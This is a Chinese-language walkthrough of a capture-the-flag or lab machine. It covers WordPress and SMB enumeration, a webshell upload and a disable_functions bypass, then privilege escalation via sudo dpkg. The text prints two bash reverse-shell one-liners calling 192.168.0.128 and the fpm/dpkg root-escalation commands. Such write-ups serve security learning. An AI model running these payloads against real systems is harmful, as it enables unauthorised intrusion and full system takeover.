IP

端口

目录扫描

发现是 wordpress ，使用 wpscan 扫描一下，并没有发现存在漏洞的插件，但是扫描到了一个用户 control ，但是没有爆破出来

访问80端口

文档说明我们可以上传一个项目，并可以被运行

服务器还开放了 139，445 端口，访问 SMB 服务

可以匿名访问

上传 shell.txt

import commands
commands.getoutput('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.0.128/4444 0>&1"')

监听本地4444端口成功反弹shell

发现用户 webserv 在本地8080端口运行了一个网站

使用 frp 将目标端口 8080 代理到本地的 6000 端口

目录扫描

发现存在 upload.php

发现可以直接上传 .php 文件，成功getshell后发现无法执行命令

使用 PHP7_UserFilter 进行绕过

检查用户拥有的文件

find / -user webservice 2>/dev/null

查看 website.py 文件

import socket
import sys
import os

scan = '127.0.0.1'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
check = s.connect_ex((scan,port))
if check == 0:
	os.system("echo 'website up'>> /opt/logs/log.txt")
else:
	os.system("echo 'website down'>> /opt/logs/log.txt")
s.close
sys.exit(0)

替换payload

import socket
import sys
import os

os.system('/bin/bash -c "bash -i >& /dev/tcp/192.168.0.128/5555 0>&1"')

监听5555端口反弹shell

执行sudo -l

利用 dpkg 提权

TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

sudo dpkg -i x_1.0_all.deb